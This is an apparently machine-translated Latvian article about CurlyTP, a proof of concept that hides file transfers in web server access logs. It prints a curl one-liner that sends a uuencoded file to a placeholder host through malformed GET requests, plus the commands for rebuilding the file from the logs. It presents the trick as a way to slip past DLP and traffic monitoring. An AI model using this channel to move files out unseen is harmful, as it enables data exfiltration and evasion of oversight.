Saskaņā ar Vikipēdiju, "mirušā drop" ir slepena ierīce, ko izmanto informācijas vai priekšmetu apmaiņai starp cilvēkiem, izmantojot slepenu atrašanās vietu. Ideja ir tāda, ka cilvēki nekad nesatiekas, bet joprojām apmainās ar informāciju, saglabājot operatīvo drošību.

Slēptuvei nevajadzētu piesaistīt uzmanību. Tāpēc reālajā pasaulē bieži tiek izmantoti neuzkrītoši priekšmeti: brīvs ķieģelis sienā, bibliotēkas grāmata vai dobums kokā.

Tiešsaistē ir pieejami daudzi šifrēšanas un anonimizācijas rīki, taču pats fakts, ka tos izmanto, piesaista uzmanību. Turklāt tos var bloķēt korporatīvajā vai valdības līmenī. Ko jums darīt?

Izstrādātājs Raiens Flauerss ir izdomājis interesantu risinājumu: izmantot jebkuru tīmekļa serveri kā kešatmiņuJa padomā, ko dara tīmekļa serveris? Tas pieņem pieprasījumus, apkalpo failus un raksta žurnālu. Un tas reģistrē visus pieprasījumus, pat nepareizas!

Izrādās, ka jebkurš tīmekļa serveris var saglabāt praktiski jebkuru ziņojumu savā žurnālā. Flauers sāka domāt, kā to izmantot.

Viņš iesaka šādu variantu:

Mēs ņemam teksta failu (slepeno ziņojumu) un aprēķinām hešu (md5sum).
Mēs to kodējam (gzip+uuencode).
Mēs rakstām žurnālā, apzināti nosūtot serverim nepareizu pieprasījumu.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Lai lasītu failu, šīs darbības jāveic apgrieztā secībā: atšifrēt un izsaiņot failu, pārbaudīt jaucējkodu (jaucējkodu var droši pārsūtīt pa atvērtiem kanāliem).

Atstarpes tiek aizstātas ar =+=, tāpēc adresē nav atstarpju. Programma, ko autors sauc par CurlyTP, izmanto base64 kodējumu, tāpat kā e-pasta pielikumos. Pieprasījums tiek veikts ar atslēgvārdu. ?transfer?lai saņēmējs to varētu viegli atrast žurnālos.

Ko mēs šajā gadījumā redzam protokolos?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Kā jau minēts, lai iegūtu slepenu ziņojumu, darbības jāveic apgrieztā secībā:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Procesu var viegli automatizēt. md5sum sakrīt, un faila saturs apstiprina, ka viss ir dekodēts pareizi.

Metode ir ļoti vienkārša. "Šī vingrinājuma mērķis ir vienkārši pierādīt, ka failus var pārsūtīt, izmantojot nevainīgus mazus tīmekļa pieprasījumus, un ka tas darbojas jebkurā tīmekļa serverī ar vienkārša teksta žurnāliem. Būtībā katrs tīmekļa serveris ir nederīgs!" raksta Flauerss.

Protams, šī metode darbojas tikai tad, ja saņēmējam ir piekļuve servera žurnāliem. Taču, piemēram, daudzi mitināšanas pakalpojumu sniedzēji nodrošina šādu piekļuvi.

Kā to izmantot?

Raiens Flauers saka, ka viņš nav informācijas drošības eksperts un neapkopos iespējamo CurlyTP lietojumu sarakstu. Viņam tas ir vienkārši koncepcijas pierādījums tam, ka pazīstamus rīkus, ko redzam ikdienā, var izmantot netradicionālos veidos.

Faktiski šai metodei ir vairākas priekšrocības salīdzinājumā ar citām servera “slēptuvēm”, piemēram, Digitālais mirušo piliens vai Pirātu kasteTam nav nepieciešama īpaša servera puses konfigurācija vai protokoli, un tas neradīs aizdomas datplūsmas monitoru vidū. Maz ticams, ka SORM vai DLP sistēmas skenēs URL, meklējot saspiestus teksta failus.

Šis ir viens no veidiem, kā pārsūtīt ziņojumus, izmantojot pakalpojumu failus. Jūs, iespējams, atceraties, kā daži progresīvi uzņēmumi agrāk izvietoja HTTP galvenes izstrādātāju darbi vai HTML lapu kodā.

Ideja bija tāda, ka šādu Lieldienu olu redzēs tikai tīmekļa izstrādātāji, jo normāls cilvēks neskatītos galvenes vai HTML kodu.